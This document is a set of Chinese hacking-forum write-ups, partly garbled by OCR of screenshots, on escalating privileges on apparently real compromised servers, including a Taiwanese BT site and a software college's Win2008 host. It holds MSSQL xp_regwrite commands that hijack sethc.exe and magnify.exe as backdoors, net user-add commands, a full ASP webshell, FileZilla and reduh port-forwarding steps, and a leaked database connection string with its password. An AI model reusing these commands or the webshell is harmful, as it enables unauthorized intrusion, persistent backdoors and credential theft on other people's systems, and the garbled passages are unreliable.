exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe','Debugger'

ConnString: server=localhost;uid=wwwdb;pwd=sdpocxndc!79;database=fasA55IJJK#@1m;Provider=SQLOLEDB

MSSQL Version : Microsoft SQL Server 2000 - 8.00.2039 (Intel X86) May 3 2005 23:18:38 Copyright (c) 1988-2003 Mic NT 5.2 (Build 3790: Service Pack 2)

SrvRoleMember : sa



Query

Value	Data
Debugger	C:\WINDOWS\system32\cmd.exe

DebuggerC:\WINDOWS\system32\cmd.exe 哈哈哈...居然成功了

```
Maple<sup>™</sup> 17:09:56
没
Maple<sup>™</sup> 17:09:58
劫持了
双面人 17:10:05
....
双面人 17:10:14
shift出不来
```

呃...shift 不行..

双面人 17:10:21 你换放大镜试试
Maple™ 17:10:29
3
Maple™ 17:10:34
放大镜是哪个
双面人 17:10:38
双面人 17:11:16

magnify.exe

继续执行

EXEC master..xp_regwrite

@rootkey='HKEY_LOCAL_MACHINE',

@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe',

@value_name='Debugger',

@type='REG_SZ',

@value='C:\WINDOWS\system32\cmd.exe'

SrvRoleMember : sa	
Please select a database : Select a DataBase 👻 SQLExec : SQL Server Exec	
Run SQL	
EXEC masterxp_regwrite @rootkey='HKEY LOCAL MACHINE',	*
<pre>@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe',</pre>	*
Querv	

继续执行来查看是否劫持成功

exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows

NT\CurrentVersion\Image File Execution Options\magnify.exe', 'Debugger'

Please select a database : | -- Select a DataBase -- 👻 | SULExec : | -- SUL Server Exec --



我郁闷,还是掉不出来

.

	登录到 Tindo	Winder Winder Enterpris	ows Se	erver 2
辅助工具管理器	Consider a constant		×	
放大镜 正在运行 屏幕键盘 没有运行				
			汉消	关机 (3)
放大镜的选项	1			
	0			
□ 锁定桌面时自动启动	(L)			
▶ 辅助工具管理器启动	时自动启动(1)			
王印	+ 确空	1003世		

在想是不是系统的被禁用了,于是调用自己上传的 cmd

EXEC master..xp_regwrite

@rootkey='HKEY_LOCAL_MACHINE',

@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe',

@value_name='Debugger',

@type='REG_SZ',

@value='F:\umail\mysql\cmd.exe'

Run SQL

exec masterxp_regread	'HKEY	LOCAL_MA	CHINE', 'SOFT
NT\CurrentVersion\Image	File	Execution	options\mag

Query

Value	Data
Debugger	F:\umail\mysql\cmd.exe

发现自己的也不行,就是弹不出来,然后面面牛封装了一个 bat 上去,发现添加用户也不成功。 然后面面大牛突提示:

双面人 17:33:10
蛋疼…
双面人 17:33:48
@value='F:\umail\mysql\cmd.exe' 这个可以加参数的吧
Maple™ 17:34:02
Maple™ 17:34:04
应该是的
双面人 17:35:13
那直接换net.exe user 123 123 /add行不行?
Maple™ 17:36:17
不知道
双面人 17:36:24
29试试
那继续
EXEC masterxp_regwrite

@rootkey='HKEY_LOCAL_MACHINE',

@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe',

@value_name='Debugger',

@type='REG_SZ',

@value='F:\umail\mysql\net1.exe user guset a123456789/ /add' 然后执行查看

exec master..xp_regread 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows

NT\CurrentVersion\Image File Execution Options\magnify.exe', 'Debugger'

exec masterxp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe','Debugger'			
Query			
Value	Data		
Debugger	F:\umail\mysql\net1.exe user guset a123456789/ /add		

成功了,但是估计也那啥,不管了,先看看

(個人 1/:41:40 没加上 Maple™ 17:41:43 估计没有成功 2面人 17:41:44 	Maple™ 17:41:27 你运行我看看		
Maple [™] 17:41:43 估计没有成功 面人 17:41:44 	(山人 17:41:40)(2. 十m		
Maple [™] 17:41:43 估计没有成功 C面人 17:41:44 	Q./JU_L		
估计没有成功 双面人 17:41:44 	Maple™ 17:41:43		
V面人 17:41:44 	估计没有成功		
administrator ASPNET caanetadmin G-uX3e6s1t_ IUSR_7009037CB8D94D8 IUSR_CAANETSERVER IWAM_7009037CB8D94D8 IWAM_CAANETSERVER nimda SQLDebugger SUPPORT_388945a0 命令运行完毕,但发生一个或多个错误。	(面人 17:41:44		
	administrator G-uX3e6s1t_ IWAM_7009037CB8D94D8 SQLDebugger 命令运行完毕,但发生一	ASPNET IUSR_7009037CB8D94D8 IWAM_CAANETSERVER SUPPORT_388945a0 个或多个错误。	caanetadmin IUSR_CAANETSERVER nimda
	lun 901		

Run SQL exec master..xp_regread 'HKEY_LOCAL_MACHINE','SON NT\CurrentVersion\Image File Execution Options\ma

-		
0	IADV.	
0.00	Jely	

Value	Data	
Debugger	c:\windows\system32\taskmgr.exe	

各种蛋疼

	登录到 Tindows Windows Server 2003 R2
请 助工具管理器	Enterprise Edition
越大镜 正在运行 屏幕键盘 没有运行	用户名 (1):
	密码 (2):
」 □ 放大镜的选项 ————————————————————————————————————	
启动(4) 停止(2)	
 □ 登录时自动启动 ①) □ 锁定桌面时自动启动 @) 	
■ 辅助工具管理器启动时自动启动 (U)	
帮助确定取	消 <mark>消</mark>

还是没有成功



EXEC master..xp_regwrite @rootkey='HKEY_LOCAL_MACHINE', @key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe', @value_name='Debugger', @type='REG_SZ', @value='c:\windows\system32\shutdown -r -t 0' 然后查看 exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe','Debugger'

Please selec Run SQL	ct a database : Select a DataBase 👻	SQLEXEC: SQL Server Ex	
exec maste NT\Current	erxp_regread 'HKEY_LOCAL_MACHIN tVersion\Image File Execution Opt	NE','SOFTWARE\Microsoft tions\magnify.exe','Debu	Windows agger'
Query			
Value	Data		
Debugger	c:\windows\system32\shutdown -r -t 0		
但是还是没 早上起来	有重新启动。一个晚上过去了,	我还是没有搞定。	
双面人 10:: 昨天那	^{26:55} 那个拿下了		
双面人 10:: NND,	^{27:15} 原来是禁用了system	的net权限	
咱们来膜拜	T		
双面人 10:30 指定的 是有点 登录前息 (注) (* Maple™ 1 可以读取) 双面人 10:31 不被杀	0:13 et路径就能加用户了, (蛋疼的就是 ^{部90KP已被做定,您不能登录,请与系统管理员做} 双击查看原图 <u>Constant</u> 10:30:28 10:30:44 hash吗? 1:19 就能	王 天.	
双面人 10:3 草, 重 Maple [™] 系啊 双面人 10:3 帐户启用 一下 Maple [™] net user 双面人 10:3 嗯	2:12 1 接 	日月	



好吧,反正是拿下了..

127.0.0.1 -	远程桌面			
1				
回收站				
20		res://mys.dll/mys.hta		
Mozilla Firetox				
				a su
			推助工社 6.近票	<u>? ×</u>
			放大镜 没有运行 屏幕键盘 没有运行	
			, 	
			成人現的远坝	
			启动 (A) 停止 (D)	
			□ 登录时自动启动 (L)	
			□ 锁定桌面时自动启动 (0)	
			□ 辅助工具管理器启动时目动启动 (2)	
			帮助 确定	1 取消 1
			0275 0022	
		8 -		

感谢面面大牛的指导。

第11节 台湾 BT 服务器提权及内网渗透

作者: huotoo 来自: 法客论坛-F4ckTeam 地址: http://team.f4ck.net

.

菜刀连接后发现权限也挺大的, c:d:e:f:都可以浏览

先是回到站点主目录,换个咱们的大马,方便提权吧,结果我拿出了我手中的各种大马(不要小看我的 webshell-_-不过我的 shell 一般都是用没有加密的,虽然我不懂的加密,但是我怕那些加密的 shell 中藏有后门,所以我的 shell 全部是未经加密的),结果都没有成功,我就去 c:/Program Files 中发现了 symantec antivirus

🚞 SQLite ODBC Driver 🚞 Symantec 🚞 Symantec AntiVirus 对了这里我还要说下,既然有 symantec 我又查看了下,发现里面还有 pcanywhere ,然后果断反目录下载 cif 文件然后本地破解,可是下载回来,本地打开却显示的都是乱码,到这里 这条思路, 就又断了。继续接上文 好吧,没有大马,我们依然可以提权,我对大马并没有什么依赖,就是用菜刀依然可以提权 接着我找了个目录上传了我的 cmd.exe 来到菜刀的虚拟终端 SETP 路径/cmd.exe 然后执行命令 [Err] ActiveX じン礚猭玻ネ 到这里,猜测应该是 wscript.shell 后来上传了个阿江 asp 探针也证实了这一点,既然 wscript.shell 无 法使用 那就拿出 Wscript.shell 被禁执行命令的 aspshell 代码如下: <object runat=server id=oScriptlhn scope=page classid="clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8"></object> <% if err then%> <object id=oScriptlhn runat=server scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B"></object> <% end if response.write("<textarea readonly cols=80 rows=20>") On Error Resume Next response.write oScriptlhn.exec("cmd.exe/c" & request("c")).stdout.readall response.write("</textarea>") response.write("<form method='post'>") response.write("<input type=text name='c' size=60>
") response.write("<input type=submit value='执行'></form>") %> 修改 cmd.exe 路径上传保存 a.asp 准备执行 cmd 可是纠结的问题又来了 〈font face="Arial, 穝灿 砰, 灿 砰,MingliU" size=2〉 〈p〉Active Server Pages</font〉 〈font face="Arial,穝灿 砰,灿 砰,MingLiU" size=2 > 岿粇 '00000000' $\langle q \rangle$ <font face="Arial, 穝灿 一砰,灿 砰, MingliU″ size=2〉 ミ ンア毖 $\langle p \rangle$? <n> 、 〈font face="Arial. 穝灿 砰.灿 砰. MingliU" size=2〉 ミ ン 'oScriptlhn' 衹 ネ岿粇 l eam

当时因为这个问题,我还在论坛提问过,但是始终没有得到结果。到这里,当时我真的有点陷入困境了,可是这才刚刚开始我怎么能松懈那,我们继续 在 c:/Program Files 文件我还发现了

🔁 Dell	RECESS 411
] 🗁 FileZilla Server	
🛅 Logs	🟉 legal.htm
а 🗁 тем	🔊 libeer/32 dll
这我们可以利用 Filezilla server 提权	
具体 Filezilla server 提权思路大家可	以先到 baidu 查询下,资料很多的
我先打开这个目录下的 FileZilla Serve	er Interface.xml 成功获取到所要用到的信息
<pre>(FileZillaServer)</pre>	type="numeric"> ord" type="string"> erver" type="numeric">1 erver" type="numeric">1 type="numeric">1 i="numeric">0 type="numeric">1 type="numeric">1 type="string">127.0.0.1
ALITERITTERELAELA	

这里我们主要用的值就是numeric 后面的端口值 这个端口就像 server-u 的45398端口一样必要转发到 本地才可以使用,还要用到的就是 password 后面的那个值 这个是登录密码

先假设这些都满足以后,也登陆成功之后,我们只要利用 filezilla 的管理权限添加一个用户,给它 c 盘的权限,然后在复制 shift 制作一个5次 shift 后门 然后3389 登录激活后门添加账户就可以了可是要满足这些上面的那个 numeric 后面的端口(默认为: 14147,这里我们就把它当做14147)就必须要把它转发到本地,我们无法利用 cmd,该怎么转发那,并且及时可以使用 cmd 服务器上还装了 symantec antivirus 即使上传 lcx 也肯定被杀,该怎么办那。。。

我们可以利用内网端口转发神器 reduh 你想到了吗 只要转发成功 然后我们在本地再进行连接

Connect to Server	×
Server Address:	Port: 14147
Administration password:	
Always connect to this serve	er
OK Ca	ancel

接下来利用这个提权的过程,我就不在这进行一一讲解了。(大致过程添加 FTP 账户,给予 c:/权限 然 后复制 shift 后门,3389登录 添加账户, 就 OK 了)

我们在接前文,前面我们说到,这个站点时 web 与 data 分离,也就是说我们拥有的 sqlserver 的 sa 权限是那台分离的服务器的权限,前面我们虽然 master..xp_cmdshell 无法使用,但是 sql server 还可 以使用其他好几种方法执行 cmd,前提是拥有 sa 权限



我们在这使用到的, 就是其中的一项, 沙盒提权 sandboxmode 选择沙盒后, 输入我们要执行的命令, 譬如 set 可是执行显示成功了, 怎么没有回显那? 怎么个情况, 我有执行 Set > d:/a.txt 然后 利用 dir tree 读取下这个 d:/a.txt 发现成功读取到 set 的设置信息,那就说明,可 以成功执行命令,只是没有回显没关系,我们每次执行命令只要这样就可以了 命令 > d:/a.txt 然后读取里面的信息 就可以了 限执行 ipconfig > d:/a.txt 通过返回的信息可以看出(这里我就不贴图了) 他在内网的 IP 为192.168.1.167 然后执行 netstat -an > d:/a.txt 我又从中找到了192.168.1.166服务器连接到了它的1433端口 并且只有192.168.1.166 连接它的1433 端口号,从这就可以判断出 Web 服务器内 IP 为: 192.168.1.166 Data 服务器内网 IP 为: 192.168.1.167 接着 whami > d:/a.txt 正如我们想的一样 因为是 sa 权限执行的沙盒 那这里返回的结果 也正是 system 权限 并且这台 data 服务器也开了3389端口,这时我们就可以利用之前的 reduh 转发时 服务器 IP 地址填 写成 data 服务器的 IP 就可以,转发成功后,我又利用 system 添加了一个账户 准备登陆时 服务器超出最大连接数 直接 mstsc /admin /v:ip:port 连接登陆进去 这个登陆时 当时是晚上12点了 也没有截图 不好意思了 这篇文章,关键是想给大家一个思路,还有遇到困难不要轻易的就退缩,细心寻找一切可以被利用 的,最终一定会达到你想要的目的,我们渗透是为了提高技术,积累经验。而不是为了破坏。 俺文化程度不高,文章写得也有点乱,以后俺会更加规范的。 好了 欢迎大家给我提宝贵意见 还有其实拿下这个站,还有其它的思路,大家自己想象吧,我就先不公布我的其它思路了。留点小 悬念 O(∩ ∩)O~ 最后忘了说一点了,因为它内网只有这两台服务器,所以我就只拿了这两台服务器。

第12节记一次曲折的 Win2008 提权

作者: 凱文 来自: 法客论坛-F4ckTeam 地址: http://team.f4ck.net

0x0 可以执行命令,看看权限



IIS 7.5 预设是每个站应用程式池独立的,即是降权了,加上服务器是 64 位,很多神器都用不上。

0x1 再看看溢出方面

C:\Windows\		± 🖌 🗎 i	卖取 星期三 2012-10-17
目录(54)文件(29)	各称	时间	📫 🖂 🖾 姑点美別
	📩 🚞 Temp	2012-10-17 00:44:42	L 駅後発程 Type1
🖃 🥌 Windows	WindowsUpdate.log	2012-10-17 00:37:54	▶ 日程投鍵
Depresentation and the second	🚞 System32	2012-10-16 23:25:52	២ 快捷方式
assembly	📃 🚞 SysWOW64	2012-10-16 23:25:52	
ia Boot Branding Cursors	🚞 inf	2012-10-15 12:15:25	
	otstat.dat	2012-10-15 12:09:40	
🛑 debug	Tasks 🚞	2012-10-14 00:13:24	
iagnostics	🚞 tracing	2012-10-14 00:13:24	
Digital Cocker	🚞 Downloaded Program Files	2012-09-21 10:19:56	
en-US	🚞 winsxs	2012-08-16 00:26:44	
E Fonts	🚞 Installer	2012-08-16 00:05:58	
🛄 Giobalization	🗊 vmguestsetup.log	2012-08-13 09:29:00	
)	J. ()
			UTF-8

最常看 Windows 下的 WindowsUpdate.log 和 bootstat.dat,有时 systeminfo 跑不出补丁的列表。 一看这服务器是全补丁的,本地溢出就不用试了。

12943824664,0:80(cdubathinecentum)	☆銥繎夶畾__Ĕnd
退出登录 文件(夹)管理 Cmd命令 IIS探测 系统进程 系统服务 用户(组)信息 系统信息 文件搜索 Serv-U提 Framework Ve 权 注册表查询 端口扫描 数据库管理 端口映射	: 2.0.50727.5456
端口扫描 >>	
IP: 127.0.0.1 端口: 21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500 扫描	
127.0.0.1 : 21	
127.0.0.1 : 25 Close	
127.0.0.1 : 80 Open	
127.0.0.1 : 110 Close	
127.0.0.1 : 1433 Open	
127.0.0.1 : 1723 Close	
127.0.0.1 : 3306 Close	
127.0.0.1 : 3389 Glose	
127.0.0.1 : 4899 Close	
127.0.0.1 : 5631 Close	
127.0.0.1 : 43958 Close	
127.0.0.1 : 65500 Close	
Copyright © 2009-2012 ON-e.cn All Rights Reserved.	

扫下端口...21 80 1433, 好,下一步。 0x2 档案目录

重新输入路径
检测可能需要一定的时间请稍等
[目录]C:\WINDOWS\PCHealth\ERRORREP\QHEADLES\
[目录]C:\WINDOWS\PCHealth\ERRORREP\QSIGNOFF\
[目录]C:\WINDOWS\system32\catroot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\
[目录]C:\WINDOWS\system32\com\dmp\
[目录]C:\WINDOWS\system32\Tasks\
[目录]C:\WINDOWS\Registration\CRMLog\
[目录]C:\WINDOWS\system32\spool\drivers\color\
[目录]C:\WINDOWS\system32\spool\PRINTERS\
[目录]C:\WINDOWS\Tasks\
[文件]C:\WINDOWS\Tasks\cmd exe
[文件]C:\WINDOWS\Tasks\cmd.txt
[文件]C:\WINDOWS\Tasks\iis6.exe
[文件]C:\WINDOWS\Tasks\pr.exe
[文件]C:\WINDOWS\Tasks\Server.exe
[文件]C:\WINDOWS\7i24.com\FreeHost\ [缺少对象]
[目录]C:\WINDOWS\Temp\
[目录]C:\WINDOWS\system32\spool\PRINTERS\
[目录]C:\WINDOWS\Registration\CRMLog\
[目录]C:\WINDOWS\PCHealth\ERRORREP\QHEADLES\
[目录]C:\WINDOWS\PCHealth\ERRORREP\QSIGNOFF\
[文件]c:\Program Files\Common Files\DU Meter\ [缺少对象]
[文件]c:\Program Files\Keniu\Keniu Shadu\ProgramData\ [缺少对象]
[文件]c:\Program Files\Keniu\Keniu Shadu\Temp\ [缺少对象]
[文件]C:\Program Files\Microsoft SQL Server\90\Shared\ErrorDumps\ [缺少对象]
[文件]c:\Program Files\KSafe\AppData\update\ [缺少对象]
[文件]c:\Program Files\KSafe\AppData\ [缺少对象]
[文件]c:\Program Files\KSafe\Temp\uptemp\ [缺少对象]
[文件]c:\Program Files\KSafe\Temp\ [缺少对象]
[文件]c:\Program Files\KSafe\webui\icon\ [缺少对象]
[文件]c:\Program Files\Rising\RAV\XMLS\ [缺少对象]
[文件]c:\Program Files\Rising\RAV\ [缺少对象]

没发现什么目录可利用的,但整个 D 盘可读可写十分不安全,先记下,可能以后有用。 D 盘找到 edu.xxxx.cn 但发现是用 Access 的,找个旁站看看

D:\website\Panan.e	onnennadminik		± 🗸	读取	星期三 2012-10-17 九月初
123.232.109.9	目录(9),文件(8)	名称	छ †। जि	大小	🗆 🖾 站点类别
	lise com on	📩 🧰 bin	2012-10-14 00:14:18	0	□ 默认类別 □ Type1
dbback		images	2012-10-14 00:14:18	0	日日日相投版
	and the second secon	🚞 NeatUpload	2012-10-14 00:14:18	0	🗄 🛄 Check Upda
🚞 admir	nstrator	🧰 upload	2012-10-14 00:14:18	0	○ 快硬方式 □ 上後下袋
🖾 app_	data at aliant	🚞 UpLoadImage	2012-10-14 00:14:18	0	
🛄 aspri	et_cilent	🚞 UpLoads	2012-10-14 00:14:20	0	
🫅 imag	es	🛅 admin_menu.aspx	2012-07-24 17:10:48	3081	
🚞 Neat	Upload	🗖 📓 GetCityByIpService.asmx	2011-12-02 16:48:52	109	
uploa Control of the lateration of the lateratio	ad Nadimane	🔒 laitin an air	2012-02-21 23:12:53	52066:	
🛅 UpLo	pads	Web.Admin.dll	2011-11-03 20:32:41	32000	
🚞 kailinen	en and Micro	📧 net.aspx	2012-10-13 10:33:01	68	
	ap	root.asp	2012-10-15 17:42:26	28	
🧰 jah kaitis	5-000 AD	📓 Web.config	2012-08-08 15:44:32	5087	
🚞 WebSite	1	💛 👼 website.rar	2012-05-31 22:37:15	32183	
🚬 🛄 WebSite	9			-	

行 aspx 的,看 Web.config 应会有发现。



有数据库连资料,看似是用 DES 方式加密后再用 Base64 的,就上网找个解密

gorithm D	es	× N	lode C	BC	~	(if you don't know what mode means, click here or don't worry shout it)
Decode ti	he input using	Base	54 🗸	and a		
						Depart this
						Decrypt this
esult (deryp	oted with des)	c.	100000		(and a second	
sul10e=	falsa.); I	Initia.	1 Ca	tal	og=HaiTianGroup.Web;Integrated

哈哈,出来了,这时想起 rootkit 牛说 MSSQL 不是 system 权限,就去看被降成什么了。

0x3 MSSQL

Кеу	Value
Parent Key	
Linkage	<subкey></subкey>
Performance	<subkey></subkey>
Туре	16
Start	2
ErrorControl	1
ImagePath	"C:\Program Files\Microsoft SQL Server\MSSQL10_50.MSSQLSERVER\MSSQL\Binn\sqlservr.exe" - sMSSQLSERVER
DisplayName	SQL Server (MSSQLSERVER)
ObjectName	NT AUTHORITY\NetworkService
Description	提供数据的存储、处理和受控访问,并提供快速的亊务处理。
ServiceSidType	1

读注册表,所有服务都在

HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services 里。

降成了 Network Service...这下蛋痛,先连接试试吧。先看 master 里的 sys.sql_logins。

□ © → + > = □ ×								
配置 SELECT name, is_disabled FROM sys.s	qLlogins	土 🖌 执行	夏朔三 2012-10-17 九月初三					
执行成功!返回2行	name	is_disabled	································					
HeiTigeGoup Web	🗂 sa	true	■ 駅认类別 □ Type1					
 master master spt_fallback_db spt_fallback_dev spt_values model msdb tempdb tempdb 	La construction de la constructi	false	 日君授戰 快捷方式 					

我靠!! SA 被停用!!! 只用一个 db_owner 的账户,果然是间软件学院,管理员都不是白吃米饭的。数 据库方向行不通。

0x4 整理思路

IIS 和 MSSQL 都被降权之下十分蛋痛,想在 D 盘再找找的可是没有时间,就这样暂停了...

昨天看到 rootkit 牛说还未有下文,加上我对提 Win2008 有兴趣,就重燃心中的一团火,提权要有恒 心才行!!

今天回家途中在想,这台机又不是很安全,D盘一定可以找出什么的。

就在翻目录,发现大部分都不可利用。个多小时后,终于在一个测试目录找到

:\test\				+ 🗸	读取	夏朝三 2012-10-17 九月初三
1999-1999 目录(3)文件(4)		名称	时间	大小	属性	🗆 🖂 站点类别
aj 🧰	*		2012-10-14 00:14:02	0	- 22	默认类別 Turnet
ist		🔁 Kellensen mikaansi	2012-10-14 00:14:02	0	32	▶ 日程投解
🔁 member		🚞 web	2012-10-14 00:14:02	0	-	🛅 快捷方式
productbuy		📑 administration.config	2012-03-07 20:19:48	18258	-	
		applicationHost.config	2012-03-07 21:23:46	85073	52	
	1	🕖 configEncKey.key	2012-03-07 22:14:58	2056	74	
BaoMingPage		🗐 s.txt	2012-10-15 14:42:15	291840		
CRMExam						
DataBase						
ingbo	0					
🚞 PackageTmp						
C register						
Eest						
heitisten anglungsing						
i website						
C WebSite1						
uebsite_old						

这些配置档案应该在 System32\inetsvr\config 里面的,但管理员抄了出来。

D:\test\applicationHost.config	~	保存	星 期三 2012-10-17 九月初三
			日 🗖 秋石巡到
<site id="9" name="entited to a series" serverautostart="true"></site>			\$K (A, 52 PH
<application applicationpool="sont namen comen" path="/"></application>			Type1
<virtualdirectory path="/" physicalpath="D:\WebSite1"></virtualdirectory>			⑤ 目程投解
 kindings>			D DOMESTICK
		· · · ·	
<site id="10" name="landiantia"></site>			
<application path="/"></application>			
<virtualdirectory path="/" physicalpath="D:\website"></virtualdirectory>			
 /binding protocol="ftp" bindingInformation="100.000_100.000_100.000_11" />			
<ftpserver></ftpserver>			
<security></security>			
<ssl controlchannelpolicy="SslAllow" datachannelpolicy="SslAllow"></ssl>			
<authentication></authentication>			
 dasicAuthentication enabled="true" />			
<site id="11" name="htftp"></site>			
<application path="/"></application>			
<virtualdirectory path="/" physicalpath="D:\website_old"></virtualdirectory>			
 bindings>			
 binding protocol="ftp" bindingInformation="1000000100.008991:" />			

发现一些 FTP 配置,用户权力应很大,可惜不是 Network Service 权限,不然就可跑出明文密码了。

再在找着,发现学院主站的应用程式池是以 System 运行,其他副站则是降权的,那这下可得手了, 真是百密一疏啊 呵呵。

0x5 提权

+	> = 🗖 🗙
	复 期三 2012-10-17 九月初三
[*]基本信息 [A:C:D:E:]	 回 匹 站点类別 [] 默认类別
D:\website\h <mark>uilianaanaanw</mark> web\> whoami nt authority\system	
D:\website\h <mark>ai'iaaaaaaa</mark> .web\>	
· · · · · · · · · · · · · · · · · · ·	
	UTF-8

确认主站是 System 权限

	+		> = 🗖 🗙
配置 🖾 EXEC masterxp_regread "	HKEY_LOCAL_MACHINE','SYSTEM\CurrentCr \pm 🗸 $\ $	执行	夏朝三 2012-10-17 九月初三
配置 ■ EXEC masterxp_regread ' 执行成功版回1行 HarTie Complexed master model msdb Complexed tempdb HarTie Complexed	HKEY_LOCAL_MACHINE','SYSTEM\CurrentCi ± ✓ Value Data	执行	 夏朝三 2012-10-17 九月初三 ○ は 成美別 ■ 歇认美別 丁ype1 > 日祝投録 ● 快後方式